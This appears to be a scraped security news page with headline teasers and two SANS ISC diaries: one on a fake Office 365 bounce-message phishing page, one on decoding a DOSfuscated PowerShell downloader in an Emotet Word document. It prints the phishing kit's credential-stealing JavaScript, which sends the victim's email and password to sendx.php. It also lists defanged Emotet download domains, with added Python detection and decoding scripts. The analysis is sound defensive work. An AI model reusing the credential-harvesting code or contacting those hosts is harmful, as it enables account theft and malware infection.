FreeBSD Network File System Multiple Security Vulnerabilities
 
QEMU CVE-2018-16867 Directory Traversal Vulnerability
 

Posted by InfoSec News on Dec 13

https://www.businessinsider.com/bloomberg-reporters-compensation-2013-12

By Julia La Roche
Business Insider
Dec. 11, 2013

Bloomberg News has an unusual practice of paying some of its reporters
explicitly for publishing "market-moving" stories.

This is one of many metrics that is factored into reporters' annual
bonuses.

This practice is not widespread in the financial news industry, and
journalists we spoke to from other...
 

Posted by InfoSec News on Dec 13

https://www.zdnet.com/article/ships-infected-with-ransomware-usb-malware-worms/

By Catalin Cimpanu
Zero Day
ZDNet News
December 12, 2018

Ships suffer from the same types of cyber-security issues as other IT
systems, a recent document released by the international shipping industry
reveals.

The document is the third edition of the "Guidelines on Cyber Security
onboard Ships," an industry-approved guide put together by a...
 

Posted by InfoSec News on Dec 13

https://fas.org/blogs/secrecy/2018/12/dni-reciprocity/

By Steven Aftergood
Secrecy News
Federation of American Scientists
Dec. 12, 2018

One of the most vexatious aspects of the system of granting security
clearances for access to classified information has been the reluctance of
some government agencies to recognize the validity of clearances approved
by other agencies, and to require new investigations and adjudications of
previously...
 

Posted by InfoSec News on Dec 13

https://www.washingtonpost.com/opinions/2018/12/12/washington-must-wake-up-abuse-software-that-kills/

By Josh Rogin
Columnist
The Washington Post
December 12, 2018

Dictators are using spyware to persecute dissidents and journalists at an
alarming rate, while the foreign firms that sell these tools assure the
public that everything is just fine. It's time Washington policymakers and
lawmakers rein in the proliferation and abuse of...
 

Posted by InfoSec News on Dec 13

https://www.cnbc.com/2018/12/12/freelance-hackers-get-paid-to-test-the-defenses-of-firms-like-tesla.html

By Kate Fazzini
CNBC.com
12 Dec 2018

Freelance elite hackers can make more than $500,000 a year searching for
security flaws and reporting those issues at big companies like Tesla and
organizations like the Department of Defense, according to new data
released by ethical hacking platform Bugcrowd.

The company, founded in 2012, is one of...
 

Here is a nice example of a phishing attack that I found while reviewing data captured by my honeypots. We all know that phishing is a pain and that attackers are always searching for new tactics to entice the potential victim to click on a link, disclose personal information or more.

This time, the email mimics a fake NDR ("Non Delivery Receipt") from Microsoft Office 365. Here is an official one (grabbed as-is from Google Images):


You have probably already received this kind of notification; with Office 365 being very popular, the chances increase daily. Now, let's have a look at the fake one:

Note also the interesting sender email address; that inspires extra trust, doesn't it?

If you click on the link to resend the mail, guess what? The bad guy asks you to enter the password related to the email address passed as an argument in the URL:

Here is the piece of code called when you submit the form:

function sendmails() {
  // Read the victim's email address and password from the fake login form
  var em = $('#testx').val();
  var ps = $('#pass').val();
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      var response = JSON.parse(this.responseText);
      if (response.msg == "donesend") {
        // Credentials accepted by the back end: show a "thanks" message, then redirect to the real Outlook
        $(".login_form").hide();
        $(".thanks").show();
        setTimeout("window.location.href='https://outlook.office365.com/owa/?realm';", 5000);
      } else {
        // Otherwise display the usual "incorrect password" message (note the malformed <a/> closing tag)
        $("#warning").empty();
        $('#warning').append('Your email or password is incorrect. If you don\'t remember your password,<a href="#"> reset it now.<a/>');
      }
    }
  };
  // Send the captured credentials to the kit's back end in the query string of a GET request
  xhttp.open("GET", "sendx.php?user=" + em + "&pass=" + ps, true);
  xhttp.send();
}

It is based on XMLHttpRequest[1], which allows the browser to query another page without reloading the current one. Depending on the result returned by sendx.php, you get a warning message or a redirect to the official Outlook homepage. My guess is that the PHP code tries to validate the credentials against a Microsoft service.

[1] https://www.w3schools.com/xml/xml_http.asp
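A small static check for the two traits of this kit, the password leaving the page in a GET query string and the post-submit redirect to the genuine Office 365 URL. This is an added example, not code from the diary or the phishing kit; the embedded JavaScript is a condensed, constructed version of the sendmails() routine above, and the regexes are heuristics assumed for this illustration.

```python
import re

# Constructed sample (not the kit's full code): a condensed version of the
# sendmails() routine quoted above, embedded so the audit runs offline.
SAMPLE_JS = r"""
function sendmails() {
  var em = $('#testx').val();
  var ps = $('#pass').val();
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      setTimeout("window.location.href='https://outlook.office365.com/owa/?realm';",5000);
    }
  };
  xhttp.open("GET", "sendx.php?user=" + em + "&pass=" +ps, true);
  xhttp.send();
}
"""

# var ps = $('#pass').val();  -> the JS variable that carries the password
PASS_VAR = re.compile(r"var\s+(\w+)\s*=\s*\$\(['\"]#\w*pass\w*['\"]\)\.val\(\)", re.I)
# xhttp.open("GET", <url expression>, true)
OPEN_CALL = re.compile(
    r"\.open\(\s*['\"](\w+)['\"]\s*,\s*(.+?)\s*,\s*(?:true|false)\s*\)", re.I | re.S)
# window.location.href='https://...'  (the redirect after the form is submitted)
REDIRECT = re.compile(r"location\.href\s*=\s*['\"](https?://[^'\"\\;]+)")


def audit_credential_flow(js: str) -> dict:
    """Return the GET URL expressions that carry a password and the hard-coded
    redirect targets; both together are the signature of this kit."""
    pass_vars = set(PASS_VAR.findall(js))
    leaks = []
    for method, url_expr in OPEN_CALL.findall(js):
        uses_password = "pass=" in url_expr.lower() or any(
            re.search(rf"\b{re.escape(v)}\b", url_expr) for v in pass_vars)
        if method.upper() == "GET" and uses_password:
            leaks.append(url_expr)
    return {"password_in_get": leaks, "post_submit_redirects": REDIRECT.findall(js)}


if __name__ == "__main__":
    print(audit_credential_flow(SAMPLE_JS))
```

A hit on both keys is worth a closer look when triaging a suspicious login page: legitimate sign-in forms do not put the password in a GET query string, and they do not bounce the user to another vendor's login afterwards.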

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reader Vince asked for help with the analysis of a malicious Word document. He started the analysis himself, following the method I illustrated in diary entry "Word maldoc: yet another place to hide a command".
Following this method, Vince found a shell statement:

He then searched for the string zOSpqpzMSfs, but couldn't find the PowerShell command.

In the diary entry Vince followed, I search for a VBA string, that is, a string delimited with double quotes: "j9tmrnmi". That VBA string is used to identify an object that we can find in the streams of the OLE file.
The string zOSpqpzMSfs that Vince is searching for is actually a VBA variable name, not a VBA string. The value of this variable is calculated at run time and is not explicitly stored as an object property:

That is why the method followed by Vince does not work for this sample. You need to find the value of the variable, for example by reverse engineering the VBA statements and then calculating the value accordingly.

But there is also a "quick-and-dirty" method that I illustrated in diary entry "Quickie: String Analysis is Still Useful": just search for long strings (printable character sequences) in the document file, regardless of the internal file structure.
This works for Vince's sample (here I'm grepping for cmd to keep the output short):


What we have here is a PowerShell command obfuscated with a DOSfuscation technique.

This command-line statement selects characters from the string in red using indices in yellow:

to build the following command:

I used Python to do the indexing and concatenation to decode the PowerShell command:


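The same indexing-and-concatenation step, written out as a general decoder for the cmd.exe substring form of DOSfuscation (`set "VAR=pool"` followed by a chain of `%VAR:~start,length%` references). This is an added example, not the diary's script, and the obfuscated command line it decodes is a constructed sample, not the one from Vince's document; cmd.exe semantics for negative start and length values are handled, while caret (`^`) escaping is assumed absent.

```python
import re
from typing import Optional

# Constructed sample in the DOSfuscation style discussed above (not the
# diary's actual command): a scrambled character pool is stored in an
# environment variable and the real command is rebuilt from substrings.
SAMPLE = (
    'cmd /c "set "x=cl-shwerp otnam" && call '
    '%x:~8,1%%x:~10,1%%x:~5,1%%x:~6,1%%x:~7,1%%x:~3,2%%x:~6,1%%x:~1,1%'
    '%x:~1,1%%x:~9,1%%x:~2,1%%x:~12,1%%x:~10,1%%x:~8,1%%x:~9,1%%x:~2,1%'
    '%x:~0,1%%x:~9,1%%x:~4,1%%x:~10,1%%x:~3,1%%x:~11,-3%%x:~-3%%x:~6,1%"'
)

# set "NAME=value" or set NAME=value; the value ends at a quote or '&'.
ASSIGN = re.compile(r'\bset\s+"?(\w+)=([^"&]*)"?', re.I)
# %NAME:~start% or %NAME:~start,length% (also !NAME:~...! delayed expansion)
SUBSTR = re.compile(r"[%!](\w+):~(-?\d+)(?:,(-?\d+))?[%!]")


def cmd_substring(value: str, start: int, length: Optional[int]) -> str:
    """Apply cmd.exe substring rules: a negative start counts from the end,
    a missing length runs to the end, and a negative length drops that many
    characters from the end."""
    n = len(value)
    s = start if start >= 0 else max(n + start, 0)
    if length is None:
        return value[s:]
    e = s + length if length >= 0 else n + length
    return value[s:e]


def decode_dosfuscation(cmdline: str) -> str:
    """Collect the set assignments, then expand every substring reference in
    the final command segment to recover the plaintext command."""
    env = {m.group(1).lower(): m.group(2) for m in ASSIGN.finditer(cmdline)}

    def expand(m: re.Match) -> str:
        name = m.group(1).lower()
        if name not in env:          # unknown variable: leave the reference untouched
            return m.group(0)
        length = int(m.group(3)) if m.group(3) is not None else None
        return cmd_substring(env[name], int(m.group(2)), length)

    payload = cmdline.rsplit("&&", 1)[-1]          # the 'call ...' segment
    expanded = SUBSTR.sub(expand, payload)
    expanded = re.sub(r"^\s*call\s+", "", expanded, flags=re.I)
    return expanded.strip().strip('"')


if __name__ == "__main__":
    print(decode_dosfuscation(SAMPLE))
```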
And this PowerShell command is a downloader: a command that downloads and executes a malicious executable.

Notice that this downloader tries 5 URLs:

wpthemes[.]com
tom-steed[.]com
bobvr[.]com
alexzstroy[.]ru
herbliebermancommunityleadershipaward[.]org

to download an Emotet variant.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.